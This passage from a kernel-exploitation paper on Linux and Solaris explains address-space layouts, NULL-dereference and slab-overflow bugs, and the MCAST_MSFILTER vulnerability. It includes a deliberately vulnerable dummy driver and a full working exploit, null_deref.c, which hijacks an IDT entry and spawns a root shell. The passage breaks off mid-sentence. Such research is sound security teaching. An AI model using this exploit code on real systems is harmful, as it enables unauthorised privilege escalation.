+explotation. The growing diffusion of "security prevention" approaches
+(no-exec stack, no-exec heap, ascii-armored library mmapping, mmap/stack
+and generally virtual layout randomization, just to point out the most
+known) has/is made/making userland explotation harder and harder. 
+Moreover there has been an extensive work of auditing on application codes,
+so that new bugs are generally more complex to handle and exploit. 
+
+The attentions has so turned towards the core of the operating systems,
+towards kernel (in)security. This paper will attempt to give an insight
+into kernel explotation, with examples for IA-32, UltraSPARC and AMD64. 
+Linux and Solaris will be the target operating systems. More precisely, an
+architecture on turn will be the main covered for the three main
+exploiting demonstration categories : slab (IA-32), stack (UltraSPARC) and
+race condtion (AMD64). The details explained in those 'deep focus' apply,
+thou, almost in toto to all the others exploiting scenarios.     
+
+Since explotation examples are surely interesting but usually do not show
+the "effective" complexity of taking advantages of vulnerabilities, a
+couple of working real-life exploits will be presented too.   
+
+
+------[ 1 - The playground 
+
+
+Let's just point out that, before starting : "bruteforcing" and "kernel"
+aren't two words that go well together. One can't just crash over and
+over the kernel trying to guess the right return address or the good
+alignment. An error in kernel explotation leads usually to a crash,
+panic or unstable state of the operating system.
+The "information gathering" step is so definitely important, just like
+a good knowledge of the operating system layout.  
+ 
+
+---[ 1.1 - Kernel/Userland virtual address space layouts 
+
+From the userland point of view, we don't see almost anything of the
+kernel layout nor of the addresses at which it is mapped [there are
+indeed a couple of information that we can gather from userland, and
+we're going to point them out after]. 
+Netherless it is from the userland that we have to start to carry out our
+attack and so a good knowledge of the kernel virtual memory layout
+(and implementation) is, indeed, a must. 
+
+There are two possible address space layouts :
+
+- kernel space on behalf of user space (kernel page tables are
+replicated over every process; the virtual address space is splitted in
+two parts, one for the kernel and one for the processes).  
+Kernels running on x86, AMD64 and sun4m/sun4d architectures usually have
+this kind of implementation. 
+
+- separated kernel and process address space (both can use the whole
+address space). Such an implementation, to be efficient, requires a 
+dedicated support from the underlaining architecture. It is the case of
+the primary and secondary context register used in conjunction with the
+ASI identifiers on the UltraSPARC (sun4u/sun4v) architecture.   
+
+To see the main advantage (from an exploiting perspective) of the first
+approach over the second one we need to introduce the concept of
+"process context".   
+Any time the CPU is in "supervisor" mode (the well-known ring0 on ia-32),
+the kernel path it is executing is said to be in interrupt context if it
+hasn't a backing process.
+Code in interrupt context can't block (for example waiting for demand
+paging to bring in a referenced userspace page): the scheduler is
+unable to know what to put to sleep (and what to wake up after). 
+
+Code running in process context has instead an associated process
+(usually the one that "generated" the kernel code path, for example
+issuing a systemcall) and is free to block/sleep (and so, it's free to
+reference the userland virtual address space). 
+ 
+This is a good news on systems which implement a combined user/kernel
+address space, since, while executing at kernel level, we can
+dereference (or jump to) userland addresses. 
+The advantages are obvious (and many) :
+
+  - we don't have to "guess" where our shellcode will be and we can
+    write it in C (which makes easier the writing, if needed, of long and
+    somehow complex recovery code)
+
+  - we don't have to face the problem of finding a suitable large and
+    safe place to store it. 
+
+  - we don't have to worry about no-exec page protection (we're free to
+    mmap/mremap as we wish, and, obviously, load directly the code in
+    .text segment, if we don't need to patch it at runtime). 
+
+  - we can mmap large portions of the address space and fill them with 
+    nops or nop-alike code/data (useful when we don't completely
+    control the return address or the dereference)
+
+  - we can easily take advantage of the so-called "NULL pointer
+    dereference bugs" ("technically" described later on)
+    
+The space left to the kernel is so limited in size : on the x86
+architecture it is 1 Gigabyte on Linux and it fluctuates on Solaris
+depending on the amount of physical memory (check
+usr/src/uts/i86pc/os/startup.c inside Opensolaris sources).
+This fluctuation turned out to be necessary to avoid as much as possible
+virtual memory ranges wasting and, at the same time, avoid pressure over
+the space reserved to the kernel.  
+
+The only limitation to kernel (and processes) virtual space on systems
+implementing an userland/kerneland separated address space is given by the
+architecture (UltraSPARC I and II can reference only 44bit of the whole
+64bit addressable space. This VA-hole is placed among 0x0000080000000000
+and 0xFFFFF7FFFFFFFFFF).  
+
+This memory model makes explotation indeed harder, because we can't
+directly dereference the userspace. The previously cited NULL pointer
+dereferences are pretty much un-exploitable.
+Moreover, we can't rely on "valid" userland addresses as a place to store
+our shellcode (or any other kernel emulation data), neither we can "return
+to userspace". 
+
+We won't go more in details here with a teorical description of the
+architectures (you can check the reference manuals at [1], [2] and [3])
+since we've preferred to couple the analysis of the architectural and
+operating systems internal aspects relevant to explotation with the
+effective exploiting codes presentation.
+
+
+---[ 1.2 - Dummy device driver and real vulnerabilities 
+
+As we said in the introduction, we're going to present a couple of real
+working exploit, hoping to give a better insight into the whole kernel
+explotation process. 
+We've written exploit for : 
+
+-  MCAST_MSFILTER vulnerability [4], used to demonstrate kernel slab
+   overflow exploiting
+
+-  sendmsg vulnerability [5], used to demonstrate an effective race
+   condition (and a stack overflow on AMD64) 
+
+-  madwifi SIOCGIWSCAN buffer overflow [21], used to demonstrate a real
+   remote exploit for the linux kernel. That exploit was already released
+   at [22] before the exit of this paper (which has a more detailed
+   discussion of it and another 'dummy based' exploit for a more complex
+   scenario)
+
+Moreover, we've written a dummy device driver (for Linux and Solaris) to
+demonstrate with examples the techniques presented. 
+A more complex remote exploit (as previously mentioned) and an exploit 
+capable to circumvent Linux with PaX/KERNEXEC (and userspace/kernelspace
+separation) will be presented too.
+
+---[ 1.3 - Notes about information gathering 
+
+
+Remember when we were talking about information gathering ? Nearly every
+operating systems 'exports' to userland information useful for developing
+and debugging. Both Linux and Solaris (we're not taking in account now
+'security patches') expose readable by the user the list and addresses of
+their exported symbols (symbols that module writer can reference) :
+/proc/ksyms on Linux 2.4, /proc/kallsyms on Linux 2.6 and /dev/ksyms on
+Solaris (the first two are text files, the last one is an ELF with SYMTAB
+section).
+Those files provide useful information about what is compiled in inside
+the kernel and at what addresses are some functions and structs, addresses
+that we can gather at runtime and use to increase the reliability of our
+exploit. 
+
+But theese information could be missing on some environment, the /proc
+filesystem could be un-mounted or the kernel compiled (along with some
+security switch/patch) to not export them. 
+This is more a Linux problem than a Solaris one, nowadays. Solaris exports
+way more information than Linux (probably to aid in debugging without
+having the sources) to the userland. Every module is shown with its
+loading address by 'modinfo', the proc interface exports the address of
+the kernel 'proc_t' struct to the userland (giving a crucial entrypoint,
+as we will see, for the explotation on UltraSPARC systems) and the 'kstat'
+utility lets us investigate on many kernel parameters. 
+
+In absence of /proc (and /sys, on Linux 2.6) there's another place we can
+gather information from, the kernel image on the filesystem. 
+There are actually two possible favourable situations :
+
+  - the image is somewhere on the filesystem and it's readable, which is
+    the default for many Linux distributions and for Solaris
+
+  - the target host is running a default kernel image, both from
+    installation or taken from repository. In that situation is just a
+    matter of recreating the same image on our system and infere from it. 
+    This should be always possible on Solaris, given the patchlevel (taken
+    from 'uname' and/or 'showrev -p'). 
+    Things could change if OpenSolaris takes place, we'll see. 
+
+The presence of the image (or the possibility of knowing it) is crucial
+for the KERN_EXEC/separated userspace/kernelspace environment explotation
+presented at the end of the paper. 
+
+Given we don't have exported information and the careful administrator has
+removed running kernel images (and, logically, in absence of kernel memory
+leaks ;)) we've one last resource that can help in explotation : the
+architecture. 
+Let's take the x86 arch, a process running at ring3 may query the logical
+address and offset/attribute of processor tables GDT,LDT,IDT,TSS :
+
+- through 'sgdt' we get the base address and max offset of the GDT 
+- through 'sldt' we can get the GDT entry index of current LDT 
+- through 'sidt' we can get the base address and max offset of IDT 
+- through 'str'  we can get the GDT entry index of the current TSS 
+
+The best choice (not the only one possible) in that case is the IDT. The
+possibility to change just a single byte in a controlled place of it 
+leads to a fully working reliable exploit [*]. 
+
+[*] The idea here is to modify the MSB of the base_address of an IDT entry
+    and so "hijack" the exception handler. Logically we need a controlled
+    byte overwriting or a partially controlled one with byte value below
+    the 'kernelbase' value, so that we can make it point into the userland
+    portion. We won't go in deeper details about the IDT
+    layout/implementation here, you can find them inside processor manuals
+    [1] and kad's phrack59 article "Handling the Interrupt Descriptor
+    Table" [6].
+    The NULL pointer dereference exploit presented for Linux implements
+    this technique.  
+
+As important as the information gathering step is the recovery step, which
+aims to leave the kernel in a consistent state. This step is usually
+performed inside the shellcode itself or just after the exploit has
+(successfully) taken place, by using /dev/kmem or a loadable module (if
+possible). 
+This step is logically exploit-dependant, so we will just explain it along
+with the examples (making a categorization would be pointless). 
+
+
+------[ 2 - Kernel vulnerabilities and bugs 
+
+ 
+We start now with an excursus over the various typologies of kernel
+vulnerabilities. The kernel is a big and complex beast, so even if we're
+going to track down some "common" scenarios, there are a lot of more
+possible "logical bugs" that can lead to a system compromise.
+
+We will cover stack based, "heap" (better, slab) based and NULL/userspace
+dereference vulnerabilities. As an example of a "logical bug" a whole
+chapter is dedicated to race condition and techniques to force a kernel
+path to sleep/reschedule (along with a real exploit for the sendmsg [4]
+vulnerability on AMD64). 
+
+We won't cover in this paper the range of vulnerabilities related to
+virtual memory logical errors, since those have been already extensively
+described and cleverly exploited, on Linux, by iSEC [7] people.
+Moreover, it's nearly useless, in our opinion, to create a "crafted" 
+demonstrative vulnerable code for logical bugs and we weren't aware of any
+_public_ vuln of this kind on Solaris. If you are, feel free to submit it,
+we'll be happy to work over ;). 
+
+
+---[ 2.1 - NULL/userspace dereference vulnerabilities 
+
+
+This kind of vulnerability derives from the using of a pointer
+not-initialized (generally having a NULL value) or trashed, so that it
+points inside the userspace part of the virtual memory address space.
+The normal behaviour of an operating system in such a situation is an oops
+or a crash (depending on the degree of severity of the dereference) while
+attempting to access un-mapped memory. 
+
+But we can, obviously, mmap that memory range and let the kernel find
+"valid" malicius data. That's more than enough to gain root priviledges. 
+We can delineate two possible scenarios :
+
+  - instruction pointer modification (direct call/jmp dereference,
+    called function pointers inside a struct, etc)
+
+  - "controlled" write on kernelspace 
+
+The first kind of vulnerability is really trivial to exploit, it's just a
+matter of mmapping the referenced page and put our shellcode there.
+If the dereferenced address is a struct with inside a function pointer (or
+a chain of struct with somewhere a function pointer), it is just a matter
+of emulating in userspace those struct, make point the function pointer
+to our shellcode and let/force the kernel path to call it.
+
+We won't show an example of this kind of vulnerability since this is the
+"last stage" of any more complex exploit (as we will see, we'll be always
+trying, when possible, to jump to userspace).  
+
+The second kind of vulnerability is a little more complex, since we can't
+directly modify the instruction pointer, but we've the possibility to
+write anywhere in kernel memory (with controlled or uncontrolled data). 
+
+Let's get a look to that snipped of code, taken from our Linux dummy
+device driver :
+
+< stuff/drivers/linux/dummy.h >
+
+[...]
+
+struct user_data_ioctl
+{
+  int size;  
+  char *buffer;
+};
+
+< / >
+
+< stuff/drivers/linux/dummy.c >
+
+static int alloc_info(unsigned long sub_cmd)
+{
+  struct user_data_ioctl user_info;
+  struct info_user *info;
+  struct user_perm *perm;
+  
+[...]
+
+  if(copy_from_user(&user_info,
+                    (void __user*)sub_cmd,
+                    sizeof(struct user_data_ioctl)))
+    return -EFAULT;
+
+  if(user_info.size > MAX_STORE_SIZE)  [1]
+    return -ENOENT;
+
+  info = kmalloc(sizeof(struct info_user), GFP_KERNEL);
+  if(!info)
+    return -ENOMEM;
+
+  perm = kmalloc(sizeof(struct user_perm), GFP_KERNEL);
+  if(!perm)
+    return -ENOMEM;
+
+  info->timestamp = 0;//sched_clock();
+  info->max_size  = user_info.size;
+  info->data = kmalloc(user_info.size, GFP_KERNEL); [2]
+  /* unchecked alloc */
+
+  perm->uid = current->uid;
+  info->data->perm = perm; [3]
+
+  glob_info = info;
+
+[...]
+
+static int store_info(unsigned long sub_cmd)
+{
+
+[...]
+
+  glob_info->data->perm->uid = current->uid; [4]
+
+[...]   
+
+< / > 
+
+Due to the integer signedness issue at [1], we can pass a huge value
+to the kmalloc at [2], making it fail (and so return NULL). 
+The lack of checking at that point leaves a NULL value in the info->data
+pointer, which is later used, at [3] and also inside store_info at [4] to
+save the current uid value. 
+
+What we have to do to exploit such a code is simply mmap the zero page
+(0x00000000 - NULL) at userspace, make the kmalloc fail by passing a
+negative value and then prepare a 'fake' data struct in the previously
+mmapped area, providing a working pointers for 'perm' and thus being able
+to write our 'uid' anywhere in memory.  
+
+At that point we have many ways to exploit the vulnerable code (exploiting
+while being able to write anywhere some arbitrary or, in that case,
+partially controlled data is indeed limited only by imagination), but it's
+better to find a "working everywhere" way.
+
+As we said above, we're going to use the IDT and overwrite one of its
+entries (more precisely a Trap Gate, so that we're able to hijack an
+exception handler and redirect the code-flow towards userspace).
+Each IDT entry is 64-bit (8-bytes) long and we want to overflow the
+'base_offset' value of it, to be able to modify the MSB of the exception
+handler routine address and thus redirect it below PAGE_OFFSET
+(0xc0000000) value. 
+   
+Since the higher 16 bits are in the 7th and 8th byte of the IDT entry,
+that one is our target, but we're are writing at [4] 4 bytes for the 'uid'
+value, so we're going to trash the next entry. It is better to use two
+adiacent 'seldomly used' entries (in case, for some strange reason,
+something went bad) and we have decided to use the 4th and 5th entries :
+#OF (Overflow Exception) and #BR (BOUND Range Exeeded Exeption).
+
+At that point we don't control completely the return address, but that's
+not a big problem, since we can mmap a large region of the userspace and
+fill it with NOPs, to prepare a comfortable and safe landing point for our
+exploit. The last thing we have to do is to restore, once we get the
+control flow at userspace, the original IDT entries, hardcoding the values
+inside the shellcode stub or using an lkm or /dev/kmem patching code. 
+
+At that point our exploit is ready to be launched for our first
+'rootshell'. 
+
+As a last (indeed obvious) note, NULL dereference vulnerabilities are 
+only exploitable on 'combined userspace and kernelspace' memory model
+operating systems.
+
+
+---[ 2.1.1 - NULL/userspace dereference vulnerabilities : null_deref.c  
+
+< stuff/expl/null_deref.c >
+
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#include "dummy.h"
+
+#define DEVICE          "/dev/dummy"
+#define NOP             0x90
+#define STACK_SIZE      8192
+
+//#define STACK_SIZE 4096
+
+
+#define PAGE_SIZE       0x1000
+#define PAGE_OFFSET     12
+#define PAGE_MASK       ~(PAGE_SIZE -1)
+
+#define ANTANI          "antani"
+
+uint32_t        bound_check[2]={0x00,0x00};
+extern void     do_it();
+uid_t           UID;
+
+void do_bound_check()
+{
+        asm volatile("bound %1, %0\t\n" : "=m"(bound_check) : "a"(0xFF));
+}
+
+/* simple shell spown */
+void get_root()
+{
+  char *argv[] = { "/bin/sh", "--noprofile", "--norc", NULL };
+  char *envp[] = { "TERM=linux", "PS1=y0y0\\$", "BASH_HISTORY=/dev/null",
+                   "HISTORY=/dev/null", "history=/dev/null",
+                   "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL };
+
+  execve("/bin/sh", argv, envp);
+  fprintf(stderr, "[**] Execve failed\n");
+  exit(-1);
+}
+
+
+
+/* this function is called by fake exception handler: take 0 uid and restore trashed entry */
+void give_priv_and_restore(unsigned int thread)
+{
+  int i;
+  unsigned short addr;
+  unsigned int* p = (unsigned int*)thread;
+
+  /* simple trick */
+  for(i=0; i < 0x100; i++)
+  if( (p[i] == UID) && (p[i+1] == UID) && (p[i+2] == UID) && (p[i+3] == UID) )
+    p[i] = 0, p[i+1] = 0;
+
+}
+
+
+#define CODE_SIZE       0x1e
+
+
+void dummy(void)
+{
+asm("do_it:;"
+    "addl $6, (%%esp);"  // after bound exception EIP points again to the bound instruction
+    "pusha;"
+    "movl %%esp, %%eax;"
+    "andl %0, %%eax;"
+    "movl (%%eax), %%eax;"
+    "add $100, %%eax;"
+    "pushl %%eax;"
+    "movl $give_priv_and_restore, %%ebx;"
+    "call *%%ebx;"
+    "popl %%eax;"
+    "popa;"
+    "iret;"
+    "nop;nop;nop;nop;"
+   :: "i"( ~(STACK_SIZE -1))
+);
+return;
+}
+
+
+
+struct idt_struct
+{
+  uint16_t limit;
+  uint32_t base;
+} __attribute__((packed));
+
+
+static char *allocate_frame_chunk(unsigned int base_addr,
+                                  unsigned int size,
+                                  void* code_addr)
+{
+  unsigned int round_addr = base_addr & PAGE_MASK;
+  unsigned int diff       = base_addr - round_addr;
+  unsigned int len        = (size + diff + (PAGE_SIZE-1)) & PAGE_MASK;
+
+  char *map_addr = mmap((void*)round_addr,
+                        len,
+                        PROT_READ|PROT_WRITE,
+                        MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,
+                        0,
+                        0);
+  if(map_addr == MAP_FAILED)
+    return MAP_FAILED;
+
+  if(code_addr)
+  {
+    memset(map_addr, NOP, len);
+    memcpy(map_addr, code_addr, size);
+  }
+  else
+    memset(map_addr, 0x00, len);
+
+  return (char*)base_addr;
+}
+
+inline unsigned int *get_zero_page(unsigned int size)
+{
+  return (unsigned int*)allocate_frame_chunk(0x00000000, size, NULL);
+}
+
+#define BOUND_ENTRY 5
+unsigned int get_BOUND_address()
+{
+        struct idt_struct idt;
+        asm volatile("sidt %0\t\n" : "=m"(idt));
+        return idt.base + (8*BOUND_ENTRY);
+}
+
+unsigned int prepare_jump_code()
+{
+  UID = getuid();       /* set global uid */
+  unsigned int base_address = ((UID & 0x0000FF00) << 16) + ((UID & 0xFF) << 16);
+  printf("Using base address of: 0x%08x-0x%08x\n", base_address, base_address + 0x20000 -1);
+  char *addr = allocate_frame_chunk(base_address, 0x20000, NULL);
+  if(addr == MAP_FAILED)
+  {
+    perror("unable to mmap jump code");
+    exit(-1);
+  }
+
+  memset((void*)base_address, NOP, 0x20000);
+  memcpy((void*)(base_address + 0x10000), do_it, CODE_SIZE);
+
+  return base_address;
+}
+
+int main(int argc, char *argv[])
+{
+  struct user_data_ioctl user_ioctl;
+  unsigned int *zero_page, *jump_pages, save_ptr;
+
+  zero_page = get_zero_page(PAGE_SIZE);
+  if(zero_page == MAP_FAILED)
+  {
+    perror("mmap: unable to map zero page");
+    exit(-1);
+  }
+
+  jump_pages = (unsigned int*)prepare_jump_code();
+
+
+  int ret, fd = open(DEVICE,  O_RDONLY), alloc_size;
+
+  if(argc > 1)
+    alloc_size = atoi(argv[1]);
+  else
+   alloc_size  = PAGE_SIZE-8;
+
+  if(fd < 0)
+  {
+    perror("open: dummy device");
+    exit(-1);
+  }
+
+  memset(&user_ioctl, 0x00, sizeof(struct user_data_ioctl));
+  user_ioctl.size = alloc_size;
+
+
+  ret = ioctl(fd, KERN_IOCTL_ALLOC_INFO, &user_ioctl);
+  if(ret < 0)
+  {
+    perror("ioctl KERN_IOCTL_ALLOC_INFO");
+    exit(-1);
+  }
+
+
+  /* save old struct ptr stored by kernel in the first word */
+  save_ptr = *zero_page;
+
+  /* compute the new ptr inside the IDT table between BOUND and INVALIDOP exception */
+  printf("IDT bound: %x\n", get_BOUND_address());
+  *zero_page = get_BOUND_address() + 6;
+
+  user_ioctl.size=strlen(ANTANI)+1;
+  user_ioctl.buffer=ANTANI;
+
+  ret = ioctl(fd, KERN_IOCTL_STORE_INFO, &user_ioctl);
+
+  getchar();
+  do_bound_check();
+
+  /* restore trashed ptr */
+  *zero_page = save_ptr;
+
+  ret = ioctl(fd, KERN_IOCTL_FREE_INFO, NULL);
+  if(ret < 0)
+  {
+    perror("ioctl KERN_IOCTL_FREE_INFO");
+    exit(-1);
+  }
+
+  get_root();
+
+  return 0;
+}
+
+< / > 
+
+
+
+---[ 2.2 - The Slab Allocator 
+
+
+The main purpose of a slab allocator is to fasten up the
+allocation/deallocation of heavily used small 'objects' and to reduce the
+fragmentation that would derive from using the page-based one.
+Both Solaris and Linux implement a slab memory allocator which derives
+from the one described by Bonwick [8] in 1994 and implemented in Solaris
+2.4.
+
+The idea behind is, basically : objects of the same type are grouped
+together inside a cache in their constructed form. The cache is divided in
+'slabs', consisting of one or more contiguos page frames.   
+Everytime the Operating Systems needs more objects, new page frames (and
+thus new 'slabs') are allocated and the object inside are constructed.
+Whenever a caller needs one of this objects, it gets returned an already
+prepared one, that it has only to fill with valid data. When an object is
+'freed', it doesn't get destructed, but simply returned to its slab and
+marked as available. 
+
+Caches are created for the most used objects/structs inside the operating
+system, for example those representing inodes, virtual memory areas, etc. 
+General-purpose caches, suitables for small memory allocations, are 
+created too, one for each power of two, so that internal fragmentation is
+guaranted to be at least below 50%. 
+The Linux kmalloc() and the Solaris kmem_alloc() functions use exactly
+those latter described caches. Since it is up to the caller to 'clean' the
+object returned from a slab (which could contain 'dead' data), wrapper
+functions that return zeroed memory are usually provided too (kzalloc(),
+kmem_zalloc()). 
+
+An important (from an exploiting perspective) 'feature' of the slab
+allocator is the 'bufctl', which is meaningful only inside a free object,
+and is used to indicate the 'next free object'.
+A list of free object that behaves just like a LIFO is thus created, and
+we'll see in a short that it is crucial for reliable explotation. 
+
+To each slab is associated a controlling struct (kmem_slab_t on Solaris,
+slab_t on Linux) which is stored inside the slab (at the start, on Linux,
+at the end, on Solaris) if the object size is below a given limit (1/8 of
+the page), or outside it.
+Since there's a 'cache' per 'object type', it's not guaranted at all that
+those 'objects' will stay exactly in a page boundary inside the slab. That
+'free' space (space not belonging to any object, nor to the slab
+controlling struct) is used to 'color' the slab, respecting the object
+alignment (if 'free' < 'alignment' no coloring takes place).
+
+The first object is thus saved at a 'different offset' inside the slab,
+given from 'color value' * 'alignment', (and, consequently, the same
+happens to all the subsequent objects), so that object of the same size in
+different slabs will less likely end up in the same hardware cache lines. 
+
+We won't go more in details about the Slab Allocator here, since it is
+well and extensively explained in many other places, most notably at [9],
+[10], and [11], and we move towards effective explotation. 
+Some more implementation details will be given, thou, along with the
+exploiting techniques explanation.
+
+
+---[ 2.2.1 - Slab overflow vulnerabilities  
+
+
+NOTE: as we said before, Solaris and Linux have two different function to
+alloc from the general purpose caches, kmem_alloc() and kmalloc(). That
+two functions behave basically in the same manner, so, from now on we'll
+just use 'kmalloc' and 'kmalloc'ed memory' in the discussion, referring
+thou to both the operating systems implementation. 
+
+A slab overflow is simply the writing past the buffer boundaries of a
+kmalloc'ed object. The result of this overflow can be :
+
+- overwriting an adiacent in-slab object. 
+- overwriting a page next to the slab one, in the case we're overwriting
+  past the last object.
+- overwriting the control structure associated with the slab (Solaris
+  only)
+   
+The first case is the one we're going to show an exploit for. The main
+idea on such a situation is to fill the slabs (we can track the slab
+status thanks to /proc/slabinfo on Linux and kstat -n 'cache_name' on
+Solaris) so that a new one is necessary.
+We do that to be sure that we'll have a 'controlled' bufctl : since the
+whole slabs were full, we got a new page, along with a 'fresh' bufctl 
+pointer starting from the first object.
+
+At that point we alloc two objects, free the first one and trigger the
+vulnerable code : it will request a new object and overwrite right into
+the previously allocated second one. If a pointer inside this second
+object is stored and then used (after the overflow) it is under our
+control.
+This approach is very reliable.  
+
+The second case is more complex, since we haven't an object with a pointer
+or any modifiable data value of interest to overwrite into. We still have
+one chance, thou, using the page frame allocator. 
+We start eating a lot of memory requesting the kind of 'page' we want to
+overflow into (for example, tons of filedescriptor), putting the memory
+under pressure. At that point we start freeing a couple of them, so that
+the total amount counts for a page.  
+At that point we start filling the slab so that a new page is requested.
+If we've been lucky the new page is going to be just before one of the
+previously allocated ones and we've now the chance to overwrite it. 
+
+The main point affecting the reliability of such an exploit is : 
+
+  - it's not trivial to 'isolate' a given struct/data to mass alloc at the
+    first step, without having also other kernel structs/data growing
+    together with.
+    An example will clarify : to allocate tons of file descriptor we need
+    to create a large amount of threads. That translates in the allocation
+    of all the relative control structs which could end up placed right
+    after our overflowing buffer.
+
+The third case is possible only on Solaris, and only on slabs which keep
+objects smaller than 'page_size >> 3'. Since Solaris keeps the kmem_slab
+struct at the end of the slab we can use the overflow of the last object
+to overwrite data inside it. 
+
+In the latter two 'typology' of exploit presented we have to take in
+account slab coloring. Both the operating systems store the 'next color
+offset' inside the cache descriptor, and update it at every slab
+allocation (let's see an example from OpenSolaris sources) :
+
+< usr/src/uts/common/os/kmem.c >
+
+static kmem_slab_t *
+kmem_slab_create(kmem_cache_t *cp, int kmflag)
+{
+[...]
+        size_t color, chunks;
+[...]
+        color = cp->cache_color + cp->cache_align;
+        if (color > cp->cache_maxcolor)
+                color = cp->cache_mincolor;
+        cp->cache_color = color;
+
+< / >
+
+'mincolor' and 'maxcolor' are calculated at cache creation and represent
+the boundaries of available caching :
+
+# uname -a
+SunOS principessa 5.9 Generic_118558-34 sun4u sparc SUNW,Ultra-5_10
+# kstat -n file_cache | grep slab
+        slab_alloc                      280
+        slab_create                     2
+        slab_destroy                    0
+        slab_free                       0
+        slab_size                       8192
+# kstat -n file_cache | grep align
+        align                           8
+# kstat -n file_cache | grep buf_size
+        buf_size                        56
+# mdb -k
+Loading modules: [ unix krtld genunix ip usba nfs random ptm ]
+> ::sizeof kmem_slab_t
+sizeof (kmem_slab_t) = 0x38
+> ::kmem_cache ! grep file_cache
+00000300005fed88 file_cache                0000 000000       56      290
+> 00000300005fed88::print kmem_cache_t cache_mincolor
+cache_mincolor = 0
+> 00000300005fed88::print kmem_cache_t cache_maxcolor
+cache_maxcolor = 0x10
+> 00000300005fed88::print kmem_cache_t cache_color
+cache_color = 0x10
+> ::quit
+
+As you can see, from kstat we know that 2 slabs have been created and we
+know the alignment, which is 8. Object size is 56 bytes and the size of
+the in-slab control struct is 56, too. Each slab is 8192, which, modulo 56
+gives out exactly 16, which is the maxcolor value (the color range is thus
+0 - 16, which leads to three possible coloring with an alignment of 8). 
+
+Based on the previous snippet of code, we know that first allocation had
+a coloring of 8 ( mincolor == 0 + align == 8 ), the second one of 16
+(which is the value still recorded inside the kmem_cache_t). 
+If we were for exhausting this slab and get a new one we would know for
+sure that the coloring would be 0. 
+
+Linux uses a similar 'circolar' coloring too, just look forward for
+'kmem_cache_t'->colour_next setting and incrementation. 
+
+Both the operating systems don't decrement the color value upon freeing of
+a slab, so that has to be taken in account too (easy to do on Solaris,
+since slab_create is the maximum number of slabs created).
+
+
+---[ 2.2.2 - Slab overflow exploiting : MCAST_MSFILTER 
+
+
+Given the technical basis to understand and exploit a slab overflow, it's
+time for a practical example. 
+We're presenting here an exploit for the MCAST_MSFILTER [4] vulnerability
+found by iSEC people :
+
+< linux-2.4.24/net/ipv4/ip_sockglue.c >
+
+case MCAST_MSFILTER:
+{
+        struct sockaddr_in *psin;
+        struct ip_msfilter *msf = 0;
+        struct group_filter *gsf = 0;
+        int msize, i, ifindex;
+
+        if (optlen < GROUP_FILTER_SIZE(0))
+                goto e_inval;
+        gsf = (struct group_filter *)kmalloc(optlen,GFP_KERNEL); [2]
+        if (gsf == 0) {
+                err = -ENOBUFS;
+                break;
+        }
+        err = -EFAULT;
+        if (copy_from_user(gsf, optval, optlen)) {  [3]
+                goto mc_msf_out;
+        }
+        if (GROUP_FILTER_SIZE(gsf->gf_numsrc) < optlen) { [4]
+                err = EINVAL;
+                goto mc_msf_out;
+        }
+        msize = IP_MSFILTER_SIZE(gsf->gf_numsrc);  [1]
+        msf = (struct ip_msfilter *)kmalloc(msize,GFP_KERNEL); [7]
+        if (msf == 0) {
+                err = -ENOBUFS;
+                goto mc_msf_out;
+        }
+	
+	[...]
+
+        msf->imsf_multiaddr = psin->sin_addr.s_addr;
+        msf->imsf_interface = 0;
+        msf->imsf_fmode = gsf->gf_fmode;
+        msf->imsf_numsrc = gsf->gf_numsrc;
+        err = -EADDRNOTAVAIL;
+        for (i=0; i<gsf->gf_numsrc; ++i) {  [5]
+                psin = (struct sockaddr_in *)&gsf->gf_slist[i];
+
+                if (psin->sin_family != AF_INET) [8]
+                        goto mc_msf_out;
+                msf->imsf_slist[i] = psin->sin_addr.s_addr; [6]
+
+[...]
+	mc_msf_out:
+                        if (msf)
+                                kfree(msf);
+                        if (gsf)
+                                kfree(gsf);
+                        break;
+
+[...]
+
+< / >
+
+< linux-2.4.24/include/linux/in.h >
+
+#define IP_MSFILTER_SIZE(numsrc) \    [1]
+        (sizeof(struct ip_msfilter) - sizeof(__u32) \
+        + (numsrc) * sizeof(__u32))
+
+[...]
+
+#define GROUP_FILTER_SIZE(numsrc) \   [4]
+        (sizeof(struct group_filter) - sizeof(struct
+__kernel_sockaddr_storage) \
+        + (numsrc) * sizeof(struct __kernel_sockaddr_storage))
+
+< / >
+
+
+The vulnerability consist of an integer overflow at [1], since we control
+the gsf struct as you can see from [2] and [3].
+The check at [4] proved to be, initially, a problem, which was resolved
+thanks to the slab property of not cleaning objects on free (back on that
+in a short).
+The for loop at [5] is where we effectively do the overflow, by writing,
+at [6], the 'psin->sin_addr.s_addr' passed inside the gsf struct over the
+previously allocated msf [7] struct (kmalloc'ed with bad calculated 
+'msize' value). 
+This for loop is a godsend, because thanks to the check at [8] we are able
+to avoid the classical problem with integer overflow derived bugs (that is
+writing _a lot_ after the buffer due to the usually huge value used to
+trigger the overflow) and exit cleanly through mc_msf_out. 
+
+As explained before, while describing the 'first explotation approach', we
+need to find some object/data that gets kmalloc'ed in the same slab and 
+which has inside a pointer or some crucial-value that would let us change
+the execution flow.
+
+We found a solution with the 'struct shmid_kernel' :
+
+< linux-2.4.24/ipc/shm.c >
+
+struct shmid_kernel /* private to the kernel */
+{
+        struct kern_ipc_perm    shm_perm;
+        struct file *           shm_file;
+        int                     id;
+	[...]
+};
+
+[...]
+
+asmlinkage long sys_shmget (key_t key, size_t size, int shmflg)
+{
+        struct shmid_kernel *shp;
+        int err, id = 0;
+
+        down(&shm_ids.sem);
+        if (key == IPC_PRIVATE) {
+                err = newseg(key, shmflg, size);
+[...]
+
+static int newseg (key_t key, int shmflg, size_t size)
+{
+[...]
+        shp = (struct shmid_kernel *) kmalloc (sizeof (*shp), GFP_USER);
+[...]
+}
+
+As you see, struct shmid_kernel is 64 bytes long and gets allocated using
+kmalloc (size-64) generic cache [ we can alloc as many as we want (up to
+fill the slab) using subsequent 'shmget' calls ].
+Inside it there is a struct file pointer, that we could make point, thanks
+to the overflow, to the userland, where we will emulate all the necessary
+structs to reach a function pointer dereference (that's exactly what the
+exploit does). 
+
+Now it is time to force the msize value into being > 32 and =< 64, to make
+it being alloc'ed inside the same (size-64) generic cache. 
+'Good' values for gsf->gf_numsrc range from 0x40000005 to 0x4000000c. 
+That raises another problem : since we're able to write 4 bytes for
